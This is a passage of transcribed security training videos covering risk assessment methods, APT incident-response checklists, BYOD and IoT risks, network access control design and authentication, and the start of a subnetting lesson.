occurrence, annual loss expectancy, single loss expectancy. So lot of these
formulas when they are used, you get a lot of statistical data, which can be used for
objective statistical analysis. Now because you have assigned a value to each asset
and a threat, then you get the output in the monetary value.
Since you get the output in the monetary value, it is easy for you to perform cost
and benefit analysis. And of course, because you are able to generate the output in
the monetary value and perform a cost-benefit analysis, then it is easy for you to
communicate the output to the senior management. [Video description
begins] According to the slide, quantitative risk assessment is mainly good for cost
and benefit analysis. [Video description ends]
Now if you look at qualitative versus quantitative, because qualitative risk
assessment does not give you statistical data, you might find it very difficult to
convince the management. On the other hand, this becomes a strength of the
quantitative risk assessment where the output is in the monetary value and you can
also do cost-benefit analysis. And therefore, it's easy for you to convince the
management.
Now let's look at the cons of the qualitative and quantitative risk assessment. Now
when you talk about the qualitative risk assessment, it provides subjective results.
Because you have scenario-based and subjective inputs from the circumstances and
opinions of the members of the organization, you are going to get subjective
results.
There is no concrete input that is going in to give you anything but subjective
results. Therefore, that is the biggest drawback or the con of the qualitative risk
assessment. Because there is no statistical input going in, there is no monetary
value that is being used to do any kind of calculation, it does not give you any
reason or it does not give you any output that can be basis for monetary investment
on the security front.
And it is also difficult to track the risk management performance as it is difficult to
communicate the results objectively. Now because everything is not in the
monetary value, it does not allow you to do any kind of cost-benefit analysis.
Therefore, the results are pretty subjective. You may find it difficult to convince the
management based on the subjective results.
Let's now look at quantitative risk assessment disadvantages or cons. Now because
there are a lot of formulas involved, it is complex in calculations. And if you make
one error in the calculation, the output you're going to get is going to be completely
vague or incorrect. Therefore, what you have to do is be very cautious while you
are calculating the values. And then only you'll be able to come up with the correct
answer, which is the correct values.
And because there are lot of statistical calculations that are going to take place, this
particular type of risk assessment will require more time and effort.
There are several risk assessment methodologies that are available in the market.
So let's look at some of them. The first one is NIST 800-30r-1. NIST stands for
National Institute of Standards and Technology, which has SP 800-30r1 framework
for risk assessment. It is a qualitative risk assessment which was initially developed
for U.S. Federal Information Systems and Organization. Later on, once it was being
used by U.S. Federal Information Systems and Organizations, it got adopted by
various private organizations.
Then you have CCTA Risk Analysis and Management method, which is also
known as CRAMM. It was developed by a U.K. government organization named
CCTA, which stands for Central Communication and Telecommunication Agency.
This is also a qualitative method.
Then you come to Failure Modes and Effective Analysis, which is also known as
FMEA. This particular framework was initially developed for hardware, and it is a
qualitative risk assessment method. [Video description begins] The following
information is displayed on screen: Failure Modes and Effects Analysis. [Video
description ends]
Then you come to the fourth one which is Facilitated Risk Analysis Process, which
is known as FRAP, F-R-A-P. This method is specifically designed to save money
and time of the organization by allowing them to prescreen system and processes to
determine the requirement of the risk assessment.
Then we have something known as OCTAVE, which stands for Operationally
Critical Threat, Asset, and Vulnerability Evaluation. This is an approach that is
used to assess the information security needs of an organization. Using OCTAVE,
you can tailor the risk assessment, security, and skill levels to meet the security
requirements.
Then you have another method which is called as Security Officers Management
and Analysis Project, which is known as SOMAP. It uses a guide and risk
assessment tool for risk assessment analysis. It uses both qualitative and
quantitative risk assessment.
Then you have something called Spanning Tree Analysis, which represents a treelike structure in which all possible threats are listed. Each branch represents
categories of threats such as physical or network. Each branch is then extended in
the form of leaves. When risk assessment is performed, leaves and branches that
are not applicable to the current environments are terminated. And whatever is left
is considered to be risk and threat to the network or the systems.
Finally, you have something know as Value at Risk, VAR methodology. It is a
theoretical and quantitative measure used for measuring the information security
risks.
APT Checklists
[Video description begins] Topic title: APT Checklists. Your host for this session is
Ashish Chugh. [Video description ends]
Now let's talk about the APT checklist. First of all, there is no fixed method of
defining an APT checklist. It is entirely up to you or your organization to define a
specific checklist. And the reason is each infrastructure of an organization differs
from the infrastructure of the other organization. Therefore, there is no fixed
method or there is no fixed checklist that can be defined or used as a base checklist
for all organizations.
So you will have to define actions in the checklist that will be able to handle the
APT threat and the assets they can compromise. This means consider your network
scenario, consider its architecture, and see where all possible threats can occur.
Now based on that, you will have to come up with the checklist, how to mitigate
those threats, and accordingly, add those points in the checklist.
Now what do you get by adding these points in the checklist? Later on, if the same
checklist is used by another person in the organization, let's say, another team
member while you're on leave, that person should be able to identify what all
security checks have been put into place to handle an APT threat. There should be
six-step approach. You should prepare, identify, contain, eradicate, recovery, and
lesson learned.
Now basically, why there are six steps? These are the six steps that are used to
handle a particular attack. Now in this scenario, let's assume that attack has
happened. So you have to prepare, you have to identify the attack, you have to
contain it if possible. Then you have to eradicate and, finally, do the recovery part
of it.
Let's assume some of the servers have been infected with a malware during the
attack. You have to perform the recovery of those servers. And lesson learned. At
the end of the attack, after you have successfully recovered your infrastructure,
what lessons have you learned? So you have to put down those points and
understand that these points become a lesson for the other people who have not
faced this particular attack.
So they can understand how the attack happened, how did you contain the attack,
how were you able to eradicate and perform recovery. And now finally, this is the
lessons that have been learned. And as we have already discussed, these checklists
can be tailored by the organization based on their infrastructure and the
architecture. There is no need for every organization to have a single checklist.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of APT defenses and to
learn how they play a key role in network security. We did this by covering the
concept of APT defenses. We also looked at APT defenses best practices. Later, we
also covered examples of APT attacks. We also looked at some tools that are used
in APT. And finally, we also learned about the techniques to handle APT attacks.
Coming up next, in our next course, we will move on to explore the NAC and
gateways, BYOD and IoT, and importance of NACs in network security.
Information Security: NACs & Gateways
Learners will discover key features of network access control (NAC), the
importance of NAC in a network, various NAC elements, authentication, and its
implementation, in this 12-video course. Explore the risks and challenges
associated with BYOD—which means "bring your own device"—and IoT, which is
Internet of Things. You will begin the course by examining the security risks
introduced by BYOD and IoT, along with their preventive measures. You will then
explore the major challenges with BYOD in an organization. The next tutorial
defines NAC and the importance it has in a network. This leads into examining the
NAC architecture; the different features of NAC; and the impact of an improperly
configured NAC. You will learn about the various NAC elements; recall the best
practices of implementing NAC, and identify the key points for creating an
effective checklist for NAC security. In the final tutorial, learners will be asked to
list the NAC authentication methods.
Course Overview
[Video description begins] Topic title: Course Overview. Your presenter for this
course is Ashish Chugh. He is an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh. And I have more than 25 years of experience in IT
infrastructure operations, software development, cyber security, and e-learning. In
the past, I've worked in different capacities in IT industry. I worked as a quality
assurance team leader, technical specialist, IT operations manager, delivery head
for software development, and cyber security consultant.
I have a bachelor's degree in psychology and diploma in system management. My
expertise are IT operations and process management. Other than this, I have various
certifications which are certified network defender, certified ethical hacker,
computer hacking forensic investigator, and there are various certifications from
Microsoft, which are MCSE, MCSA, MCP. I'm also certified Lotus professional.
In this course, network access control, or NAC, and its importance in the security
ecosystem. We will also cover different types of NACs and what they mean for
security. Later in the course, we will also learn about the features of NAC that
apply to security. Then we will move on to understand the effect of improperly
configured NAC in a network ecosystem. Then we will also cover the complexities
that are introduced by BYOD, which is bring your own device, and IoT, which is
Internet of Things. We will also be able to look at a checklist for effective NAC
security configuration.
BYOD and IoT Security Risks
[Video description begins] Topic title: BYOD and IoT Security Risks. The presenter
is Ashish Chugh. [Video description ends]
Many organizations have also adopted the policy of BYOD, which is bring your
own device.
[Video description begins] Bring Your Own Device (BYOD). [Video description
ends]
In this policy, a user is allowed to bring their own device into the organization and
connected to the network to do their work. Now, these BYOD devices can include
laptops, smartphones, tablets or it could be any handheld device which is movable,
which can be carried with the user. With this, when an organization implements
BYOD policy, the device that is brought in by the user, it is completely owned by
the user. So, the organization does not spend any kind of money in purchasing the
device. The user purchases the device and owns the device.
[Video description begins] BYOD Advantages. [Video description ends]
So, why would an organization want to implement BYOD? Of course, there are lot
of advantages. It increases proficiency and productivity, that is the first goal.
Because the device is always with the user, of course, the proficiency and
productivity goes up. Secondly, the user is free to choose their own device. If you
talk about smartphone, it could be android or iPhone, depending on what the user
requires. It is up to the user what type or what brand of device they want to
purchase. It cuts down the organization's cost because organization does not spend
a single penny in purchasing those devices. Those are purchased by the users. It
also increases the flexibility for the user because user can not only choose their
own device, they can also opt for certain type of configuration. And because I'm
able to carry my device anywhere, so therefore I can respond to my emails or
messages from office at any point of time.
[Video description begins] BYOD Security Issues. [Video description ends]
Now, along with the advantages, BYOD also has certain security lapses or security
issues. First of all, in most cases, they are unmanaged, which means the
organization's IT team does not control the devices. They are only at users' mercy,
which could also be a reason for information leak. Let's take an example, if you
carry a mobile with you or a smartphone with you, which has organizational data.
Now, if that smartphone gets stolen, that means you have lost not only the phone,
but confidential information along with the phone. There is no guarantee that a user
has an anti-malware application or anti-malware app installed on the smartphone.
If user downloads a malicious app and then connects to the network, then there are
chances not only the smartphone is infected with the malware but that malware has
a chance to spread over to the network, which leads to a malware attack on the
network. We have already discussed that certain users will carry the confidential
information in the smart phones, or tablets, or laptops. If any of these gets stolen,
then you have lost that confidential information. Most users would have personal
and the business data on the laptop, or the smartphone, or the tablet. There is no
categorization or separation of data on these devices, which can lead to a big risk of
information being stolen.
Now, let’s look at Internet of Things, which is IoT. It is connecting the devices
together that were not earlier connected by any means. You talk about a microwave
or even a car can be connected together to the devices that have the similar
capability. With the IoT, you are connecting people, processes, data, and thing.
Each of these devices is IP enabled. There is a certain amount of data that can be
collected from these devices. And that can help you do lot of analysis with the data.
And of course, because you are collecting data, the data that you collect can be
analyzed using big data. If you have millions of data points then you can utilize big
data, otherwise, you could simply use the means of very simple methods like
calculating the data using a database.
[Video description begins] IoT. [Video description ends]
Just a little while ago, we looked at four components of IoT – people, process, data,
and things. Let's look at people first. IoT helps to connect with other people in
much better way, which means using two IoT devices, people can actually connect
and do better communication. It helps you deliver the right information to the right
person or device at the right time. When we talk about things, there are physical
devices that connect to the Internet and can share data with each other.
Then we come to the data, you can leverage data in more useful way for decision
making. So let's now look at some of the IoT security challenges. The first one is
interoperability. Now, because there are no common standards, there is a challenge
of interoperability because you don't know if there are two different vendors who
have come up with some IoT solutions. Will these solutions be able to talk to each
other or not? So that is always a question mark.
So, there is a need for some common standard which can bring interoperability
between the IoT devices. Then we come to privacy. Now, the data collected by the
IoT devices can be a point of concern. This is because these devices can collect
sensitive data from your home, business or public environments. Now, these
devices can sometimes collect data about individuals without their knowledge. So
therefore, if these devices get hacked or somebody captures the data that is flowing
into the IoT devices, the privacy of the users can be a big concern. Because the
privacy of the information is a concern, there comes the regulatory and legal issues.
Now, who's responsible if there is a data theft? Is it the implementer of the IoT
device? Or is it the manufacturer of the IoT device? The answer can be pretty much
complicated in this scenario because you don't know who is actually at fault in this
scenario. Then comes the implementation challenges. Now, because there is no
interoperability between the devices, if you go with one specific vendor, you are in
a vendor lock-in situation. Then you're own existing infrastructure has to be able to
integrate the IoT devices. So therefore, sometimes IoT devices bringing into your
office or home environment can be pretty challenging.
Challenges with BYOD
[Video description begins] Topic title: Challenges with BYOD. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the challenges with BYOD. So, first of all, the biggest
challenge is the physical theft. Now, if you have sensitive data or confidential data,
physical theft of these devices can cause lot of harm. Secondly, because these are
user-owned devices, so there is hardly any IT security policy that is applied to
these. Unless or until you use a solution like mobile device management, it is not
possible to apply a security policy onto these user devices. There is no clear
acceptable usage policy that can be implemented. An acceptable usage policy
defines the appropriate use of IT infrastructure within an organization.
Now, because these devices in BYOD are owned by the users, therefore no clear
acceptable usage policy applies. Now, if you lose the mobile device, which could
be a smartphone, tablet or a laptop, then depending on the type of information you
have, it could be really harmful for the organization if they end up losing
confidential or sensitive data within that mobile device. Most users also do not
encrypt the mobile devices, which is a smartphone, tablet, or a laptop. It is only left
open. Anybody who finds a smartphone, there would be 50-50 chances that
smartphone is always in an unlocked situation, which means the person who finds
the phone can easily get into the phone and extract whatever information he or she
has to.
Another problem with the BYOD, or another challenge with BYOD is, it is nearly
sometimes impossible to do data recovery. Because if the phone is lost, then there
is no way you can do data recovery from that phone. In fact, majority of the users
will not implement any kind of security on their mobile devices. This means that
you would probably not find anti-malware or antivirus applications, you would not
find a firewall activated. So, the security posture within these devices is missing.
There is no security posture or there is minimal security implemented, so therefore
there is no defense in depth.
Now, these are user-owned devices, they are mostly not compliant with the
organizational security policies. Another main challenge is when an employee
leaves, because it is their own device, you don't know what they are carrying in that
device. Let's take an example, if a senior management official leaves the job, now
that person has certain sensitive and confidential data on his or her mobile device.
There are no guarantees that this person is going to delete that data before leaving
the job. In most likely, the information is going to go with the employee.
NAC and Its Importance
[Video description begins] Topic title: NAC and Its Importance. The presenter is
Ashish Chugh. [Video description ends]
Many years back, there used to be only desktops, which means, only a known
desktop would connect to the network, and information was pretty much secure
with these desktops.
[Video description begins] Network Access Control (NAC). [Video description
ends]
However, over the years, things have changed. To be able to control who accesses
what, is where network access control, or NAC, steps in. NAC ensures that only
known devices are allowed to connect to the network. Before they connect to your
network, they have to meet certain requirements before they can be given access on
any particular network device. Or anything that is untrusted, or does not meet the
network requirements, will not be able to connect if NAC exists on your network. It
detects and profiles any device that is connecting to the network.
So there is a certain set of parameters that every device has to go through before
NAC can trust it. And if NAC trusts it, then based on the permissions granted to
that particular device, it will allow the device to access those elements, or
directories, or any kind of folder on the network. So let's assume you're connecting
to a network, and there is a NAC sitting on the network, which will not only check
your compliance level, it will also ensure that there is an access control policy
through which you will be matched, and the permission will be granted
accordingly.
Now, because there is only one NAC on the network and it is centralized, which
means that all the permissions for every user connecting to the network will be
validated through NAC. And if they pass the compliance, they'll be allowed to
access that particular file, folder, device, server, whichever it is, on which they have
access, they'll be allowed to access that. Now, because the technology has
advanced, NAC can be implemented within your network, or it could be cloudbased.
[Video description begins] NAC and Its Importance. [Video description ends]
Now, let's move ahead, and see why NAC has become all of a sudden so important
in a network environment. So there are increased number of wireless devices, IoT,
and BYOD devices. You need something that can do some sort of policy
enforcement, and ensure that these devices which are connecting to the network are
safe, and they are secured. Now, NAC has also become very important because of
certain regulatory compliance reasons. It could help you record many compliance
related issues with the devices. And these regulatory compliances, such as PCIDSS,
ISO, HIPAA, they might have certain requirement where you need to have
compliance records with you. And that is where NAC can help you. It could also
help you protect against malware, by limiting network access, and scanning the
network for common vulnerabilities and exposures.
Now, over the years, the number of cyber threats have increased phenomenally.
That is because most organizations do not have any kind of control where they can
limit their network use. Now, if you have NAC in the picture, you can control
where users can go and what kind of resources they can access once they get on the
network. So you can do lot of control work on the network and limit those cyber
threats on your network. Now, let's look at the need for NAC. So first of all, it helps
you do element detection. It has the capability to detect any new device that is
trying to connect to the network. It will be able to detect that. Then comes the
endpoint security assessment. So, NAC has the ability to assess whether the new
device that is connecting to the network is compliant with the security policy of the
organization.
Then comes the authentication. NAC has the ability to authenticate each and every
user that is accessing the network. And it is irrelevant from where they're
authenticating from, or which device they are using, but every user is authenticated
before granted access on the network. Then comes the remediation. What happens
if a device is attempting to connect to the network and is found non-compliant by
NAC? There is a system of quarantine that NAC follows. Then the device is put
into a quarantine state in which there are remediation servers which ensure that the
non-compliance issues are fixed on the non-compliant device.
Then comes the enforcement. Now, if a device that is attempting to connect to the
network is found to be non-compliant with the defined security policy, the NAC
that exists on the network must restrict the device access to the network. Which
means, till the time the device comes into the fully compliant state, it will not be
able to access the network. Then comes the authorization, which is the ability of
NAC to verify access by users to network resources and that is done by verifying
their compliance with the authorization scheme defined in the existing
authorization system, which is your Active Directory, or it could be a RADIUS
server as well. This is done by enforcing identity-based policies in NAC.
Then comes the monitoring. In this process, there is a continuous monitoring of
users and devices, and their sessions for any kind of suspicious activity.
NAC Architecture
[Video description begins] Topic title: NAC Architecture. The presenter is Ashish
Chugh. [Video description ends]
Let's now look at the NAC architecture. As of now, there are no standards defined
for NAC architecture. So, there are different vendors have different proprietary
architectures, but there is no fixed architecture that is followed by different
vendors. Because these vendors have their own proprietary networks, each NAC
works in a certain different way. So Microsoft has one product on NAC, Cisco has
another product on NAC, but they both work differently and they both behave little
differently. Now, this becomes an issue because if you are trying to implement one
NAC, and there might be certain devices on your network which are not compliant
with this solution, then it will become a problem.
So before implementing any kind of NAC, you must ensure that its architecture can
be well-integrated within your network. Because there has not been anybody who
has defined a common NAC architecture. Trusted Network Connect, which is
TNC, architecture is right now in the proposed stage. But it has not been adopted
fully by different vendors like Microsoft or Cisco. Now, if you look at this
particular exhibit, there are four components that are defined as the NAC
architecture.
[Video description begins] The four key components defined in the NAC
architecture are Policy decision point, Network Access Requestor, Policy
enforcement point, and Network resources. [Video description ends]
Three key components are the ones that a device encounters when making a
connection to the network. The fourth one is the network resources, which happens
after a device's access to the network has been approved. Then the network
resources can be accessed, which could be a server on the network, which could
also be a directory, or file, or a certain application. But to start with, there would
only be three key components, which are network access requestor, policy decision
point, policy enforcement point.
Features of NAC
[Video description begins] Topic title: Features of NAC. The presenter is Ashish
Chugh. [Video description ends]
Let's now look at the features of NAC. So, first of all, is the endpoint integrity
control. So when a device attempts to connect to the network, NAC can test the
device and figure out whether the device is compliant or not. So the integrity of that
particular device connecting to the network can be easily judged. And beyond that,
once the device is found to be compliant, what that device does within the network
can be easily monitored. NAC also has identity-based access control which means
the user has to be authenticated and authorized to access specific resources on the
network without which user will have no access to the network.
Then comes the guest access support. There is a certain level of guest access that
you can define within NAC. NAC also performs centralized management which
means not only it provides a real time overview of what devices are connected and
what their status is, it can perform logging of what is happening on the network.
And using centralized management, you can also root the unknown or noncompliant devices to specific portion of the network or in a quarantine zone. Then
of course, one of the good feature now NAC supports is BYOD device support.
Which means any device that is owned by the user can also be controlled by NAC.
So, there are lot of things that can be done with the BYOD devices using NAC.
When you talk about authentication, NAC has the ability to authenticate each user
who's accessing the network. No matter where they are authenticating from and
what device they are using, it is irrelevant.
Then you also get the user activity visibility. So whatever is the user doing on the
network, you will be able to monitor that. Then comes the quarantine control.
Which means any system that is found to be non-compliant can be moved into
quarantine. Till the time those devices become compliant, they will still stay in the
quarantine zone. Your organization may be adhering to certain compliance
standards, which means compliance auditing is a necessity now for the
organization. So, of course, NAC helps you do compliance auditing. And it could
just check the record of each and every device. It could ensure that when the device
connects to the network, it is checked for compliance against certain regulatory and
compliance standards. And if the device is found to be compliant, then it is granted
access.
Then we come to the policy enforcement, which means NAC makes sure the
devices on the network meet the organizational security policy, which includes not
only the software updates, it could also be antivirus updates. And it ensures that
network is not compromised because of certain non-compliant devices. So,
therefore, policy enforcement happens on continuous basis. Every device is
checked as and when it connects to the network to ensure that there is no
compliance issue that can cause a problem to the network.
Impact of Improperly Configured NAC
[Video description begins] Topic title: Impact of Improperly Configured NAC. The
presenter is Ashish Chugh. [Video description ends]
Let's now look at the impacts of an improperly configured NAC. So, what happens
if you have implemented NAC on a network, and it is not properly configured? For
example, anybody can spoof an IP address and bypass the NAC controls that are
implemented. This could happen when a certain subnet or segment of your network
does not require to be authenticated. And therefore, its IP addresses are bypassed in
NAC. Now, anybody who finds out what IP addresses or MAC addresses of these
devices, then it would be very easy for that person to bypass NAC.
Secondly, there are captive portals that are used for NAC authentication. Now, if
you do not put a complex password policy, simple passwords can be brute forced
and somebody can easily figure out what the passwords are, because passwords are
simple. Improperly configured NAC can also lead to failed IP resolutions for the
client. For instance, if DHCP does not have enough IP addresses on its pool, then it
may lead to failed IP resolution. Which means the client will not get the IP
addresses and therefore may not be able to connect to the network. In some cases,
there might be failed element detection in real time.
For instance, if the devices are attempting to connect the network, NAC is not able
to figure out what type of devices are connecting. Therefore, device authentication
will fail. And similarly, if NAC does not know what devices are connected, it
cannot defend against those devices, which means those devices may be allowed to
access the network without any kind of authentication or authorization.
NAC Elements
[Video description begins] Topic title: NAC Elements. The presenter is Ashish
Chugh. [Video description ends]
Just a little while back, we looked at three key elements of NAC, which were
access requestor, policy enforcement point, which is PEP, and policy decision
point, PDP. Going forward, let's look at each one of these elements and understand
what their job function is. When you talk about access requestor, it is the endpoint
system which is attempting to connect to the network. Because it is a device
attempting to connect, therefore, it is requesting for an access on the network.
Then comes the policy enforcement point, which is the component in NAC that
either allows or blocks the access to a particular access requestor. Policy
enforcement point, or PEP, does not do that on its own. It sends that request from
the access requestor to the policy decision point, which is PDP. Now, this particular
component of NAC acts as a verifier of the request. And if it is compliant with the
policies defined on PDP, it will either allow or deny the access, which is based on
the decision, either the access requestor will get the access or be denied the access.
Now, this particular exhibit shows the NAC elements. So you have the access
requestor, which is putting in a request to the policy enforcement point, which is
simply forwarding the request to the policy decision point, which is PDP. Now,
once PDP verifies the access request, if it grants or denies, in whichever case, it
will send back the decision to the policy enforcement point, which will, in turn,
allow or deny the access.
Best Practices of Implementing NAC
[Video description begins] Topic title: Best Practices of Implementing NAC. The
presenter is Ashish Chugh. [Video description ends]
We will now look at the best practices of implementing NAC. You should compare
the existing NAC solutions and see which one of them suits your need. So you have
to compare, do pros and cons, see there are advantages and disadvantages.
Accordingly, you should implement the solution. Now, going forward, let's assume
that you have selected a solution, that you have to create a user baseline. You have
to understand what your users do, what kind of devices you have, you are to put up
a baseline against which the users will be judged when they are attempting to
connect to the network.
Other than your normal users, you would also have guests that would need to
connect to your network. These could be contractual staff, these could be vendors,
certain visitors who come in for, let's say, showcasing a prototype would need to
connect to your network. Now, you do not want them to access the entire network
or get on to the entire network. You can put separate security controls for these
guests, so they have only limited access. When you implement NAC, you should
also ensure that you are monitoring it continuously, you are monitoring its alerts.
Because NAC would generate alerts as and when it encounters something
suspicious on the network, or it finds a device which is not behaving in a way that
it should.
You should also perform regular networking audits. This is whether you do have
NAC on your network or not, this activity you should do on regular basis. First of
all, you have to gather information, see which solution fits best on your network.
And once NAC is implemented, you have to start gathering the information about
your network. You have to see what devices are there, what kind of policies you
have to implement. So once you have done that, you should only start the
implementation, or rolling out of NAC with a small group. You should not
implement NAC on the entire network at once. This is because, if there are certain
technical issues, only a small group will be impacted rather than the entire network.
Now, when you start getting the feedback from the users, and you can fix those
technical issues, if there are, then you can start implementing on the rest of the
network, but don't do it in one go. After you've gathered feedback from the small
group, then you start rolling out your NAC on rest of the network but in
incremental phases. Eventually, you will come to a point where you've covered the
entire network. However, it was not in one single go, it was in phases. And because
NAC solutions have several features, you may not want to implement all features at
once.
Go with incremental phases, implement few features, test them out on small group,
then enable more features. Slowly and gradually, you will be able to implement all
the features, but it will not be in a one single goal. This means you will require
more time. It will take more effort, but implementation will be much better, and it
will be in a much more organized manner.
NAC Security Checklist
[Video description begins] Topic title: NAC Security Checklist. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the important points in NAC security checklist. First of
all, you need to have a policy. Now, that policy is required so that you can enforce
it on the devices that connect to the network. This policy needs to be defined based
on your organization's IT security policy. Then comes the authentication. You need
to ensure that each user is authenticated before he or she connects to the network.
You have to also ensure NAC is properly implemented in your network
environment. Basically, the integration has to be tightly coupled with other security
solutions.
Then comes the enforcement. Now, when you talk about policy enforcement, this is
whether the devices connecting to the network meet the IT security standards or
not. This could include your software updates or antivirus updates. Then comes the
integration. Now, you might have several security products already running on the
network. You will have an Active Directory or any kind of LDAP environment.
You have to ensure that you are able to integrate your NAC with those products
and directory services so that you don't have to rework on lot of things like creating
users again. Its so, if you implement and integrate it with the LDAP environment,
which in most likely would be Active Directory, the users already existing. So you
have to ensure that you know you integrate it with the Active Directory to take
advantage of it.
NAC Authentication Methods
[Video description begins] Topic title: NAC Authentication Methods. The presenter
is Ashish Chugh. [Video description ends]
Let's now look at various types of NAC authentication methods. So there are
primarily three types – web-based, proprietary client, and 802.1X. Going forward,
we will be looking at each one of them in detail. So, when you talk about webbased authentication, it uses a captive portal to gather user information which
means the user needs to come to the captive portal and provide user credentials.
Now, when a user connects to the captive portal, an IP address is already given to
the client before the user is authenticated. This means the user already has the IP
address.
Now, in the captive portal, the authentication method is pretty simple. It is only the
user credentials which consists of username and password. There could be any
other method that can be implemented but pretty much, in most cases, it is only the
username and password. Once user provides the username and password, then
NAC redirects the user to the authentication page, which could be bundled with any
of the authentication servers in the backend, it could be LDAP server or a RADIUS
server. And this kind of method can be applied to various types of platforms which
could be Linux, it could be Windows as well.
Then comes the proprietary client authentication method. Now in this method,
different vendors have different technologies that they use. So, they will have most
likely an agent application that will be installed on the client systems. Now, when
the agent is installed on the client system, it provides a tight integration between the
client and the NAC system, which is based on your organizational security policy.
Now the advantage of this particular method is that it can work with different kind
of network topologies. You're not only tied to a specific network topology.
Virtually all the topologies that exist you can implement this kind of solution.
In most cases, majority of the NAC solutions, if they're using proprietary client
authentication method which means they're using an agent. It is mostly designed for
Windows. It is quite unlikely that you would find an agent based NAC solution for
Linux or macOS. And of course, if you have a proprietary client or an agent from a
particular vendor, you are enforced into a vendor lock-in situation. So, tomorrow if
you have to change the NAC solution, you will have to uninstall the agent from all
the systems on the network.
Now let's look at 802.1X authentication method. When you talk about this as
compared to proprietary client, or captive portal, which is a web-based
authentication method, this particular method provides high level of security. This
is because it is very, very tightly integrated within the network to authenticate
users. It can support multiple protocols, which means you're not dependent or
you're not forced to use a particular protocol. Various protocols are supported in
this scenario. It is also supported via new operating systems like Windows 10 and
various other operating systems that are there in the market as of now.
One of the biggest advantage of this particular method is it can scale up to a really
large number. That means you are not tied up to use only a specific number of
clients. This method can scale up the NAC solution to a great extent. Now, having
said this, one of the biggest disadvantages, it does not provide support for Linux,
embedded systems, and Symbian operating systems. So that is the drawback. So if
you have a Linux environment, probably with 802.1X authentication method, you
don't want to go.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, our goal was to identify the importance of NACs and to learn
how it plays a key role in network security. We did this by covering the effect of an
improperly configured NAC. We also looked at the complexities introduced by
BYOD and IoT. We also looked at different types of NACs.
Then we also covered different features of NACs. And finally, we also did learn
about role of NACs in network security. Coming up next, in our next course, we
will move on to explore the subnetting and DNS, VMs and containers, and
importance of proper DNS configuration.
Information Security: Subnetting & DNS
for Security Architects
In this 11-video course, learners will discover key concepts related to subnetting,
virtual machines (VMs), container, and DNS (domain name system) security.
Examine tips and tricks used in subnetting and subnetting advantages. Explore
classless inter-domain routing (CIDR), notation, deployment and security
considerations for VMs and containers, and types of DNS attacks and mitigation
strategies. You will begin the course by taking a look at the importance of
subnetting, how it relates to security, and its advantages and disadvantages. Then
move on to defining the CIDR notation. You will examine the subnetting cheat
sheet, and learn various subnetting tips and tricks; compare VMs and containers,
and examine the deployment considerations for VMs and containers. Next, learners
will observe the best practices for deploying VMs, and the best practices for VM
and container security. In the final two tutorials of this course, you will discover the
various types of DNS attacks and their mitigations, and the various types of
subnetting attacks and mitigations.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT
infrastructure operations, software development, cybersecurity, and elearning. [Video description begins] Your host for this session is Ashish Chugh. He
is an IT consultant. [Video description ends]
In the past, I worked under different capacities in the IT industry. I've worked as a
quality assurance team leader, technical specialist, IT operations manager, and
delivery head for software development. Along with this, I've also worked as
cybersecurity consultant.
I have a bachelor's degree in psychology and diploma in system management. My
expertise are IT operations and process management. I have various certifications,
which are Certified Network Defender, Certified Ethical Hacker, Computer
Hacking Forensic Investigator.
Other than these certifications, I also have few certifications from Microsoft which
are MCSE, MCSA, and MCP. I'm also Certified Lotus Professional.
In this course, you will understand the concept of subnetting and how it applies to
security. We will also cover tips and tricks on subnetting with security in mind.
Moving ahead, we will also cover the VMs, which are virtual machines, and
containers. And we will also see proper DNS configuration for security. Later on in
the course, we will look at common attacks that specifically apply to subnetting and
DNS and how to mitigate them.
Subnetting and its Advantages
[Video description begins] Topic title: Subnetting and its Advantages. Your host for
this session is Ashish Chugh. [Video description ends]
Let's understand the concept of subnetting – what is subnetting and why it is
required and what is the importance of subnetting. Consider an analogy where there
is a large town that does not have any street or area marking. Now if you have to
deliver a courier or a letter within that town, how would you find a house where
you need to deliver this letter? It will become virtually impossible. It would take
multiple days for you to figure out where this address is and how do I deliver this
letter to this particular address.
So therefore, consider a large network in the same analogy. Now if you have a
large network, that means there are too many systems combined under one single
network, which can be pretty troublesome for a network admin to manage. So here
subnetting comes into the picture. So what is subnetting? You will split a large
network into smaller segments which are known as subnets. Now the best part is
even though network is split into smaller segments known as subnets, they can be
interconnected. So going forward, we will look at how they are interconnected.
Now the best part is if there is a traffic broadcast that is happening within the
network. So when you split the network, you divide it into multiple smaller-butmore-manageable segments. Why they are more manageable? This is because each
segment within the network maintains a routing table. Now if on a large network,
the routing table becomes huge, it becomes very large, within the smaller segments
the routing table is maintainable and it is much smaller in size.
So going forward, then if you have a smaller segments within a network, you are
able to isolate the traffic within the segments, which means if there is segment A
and segment B, if the traffic originates from segment A or subnet A, then the traffic
is limited within that particular segment.
Now how does it reaches segment 2 if it is supposed to be sent to segment 2? So
there has to be a router in between which will take that traffic and it will pass it on
to segment 2. However, without the help of the router, the traffic will never reach
segment 2. Then smaller segments also help you reduce the network congestion,
which means once a network is divided into smaller segments, it will receive the
broadcast messages that are relevant to them. If something is not relevant to them,
then it will not be received by them.
One of the key reason is systems on the network, they broadcast messages. Now
this broadcasted message is sent to every computer on the network. Assume if there
are hundreds of computers, now every computer will receive this broadcast
message. At the same time, the other 100 computers are also sending some kind of
broadcast on the network. This will cause lot of congestion on the network.
So therefore, if there is a smaller segment and then there are limited number of
systems within that segment, there is a limited amount of broadcast messages that
will happen. Therefore, the traffic is contained within that particular segment. Now
let's look at this diagram of subnetting.
[Video description begins] Screen title: Example of Subnetting. [Video description
ends] Now there is router 1, which has multiple subnets or segments which are
created with router 2, 3, and 4, which are further divided into segment 2, 3, and 4.
[Video description begins] A diagram displays containing four switches and four
routers. Switch 1 is connected to Router 1, which is further connected to Router 2,
3, and 4. Router 2 and Switch 2 are connected, Router 3 and Switch 3 are
connected, and Router 4 and Switch 4 are connected. All devices have IP addresses
beginning with 192.168. The IP addresses of Switches 1, 2, 3 and 4 end in 1.0/24,
2.0/24, 3.0/24, and 4.0/24 respectively. The IP addresses of Routers 2, 3 and 4 end
in 5.0/24, 6.0/24, and 7.0/24 respectively. Router 1 has no IP address attached to
it. [Video description ends]
Assume segment 2 or subnet 2 has to send out the traffic to segment 3. Then it
cannot directly send the traffic. The traffic has to be routed through router 2, router
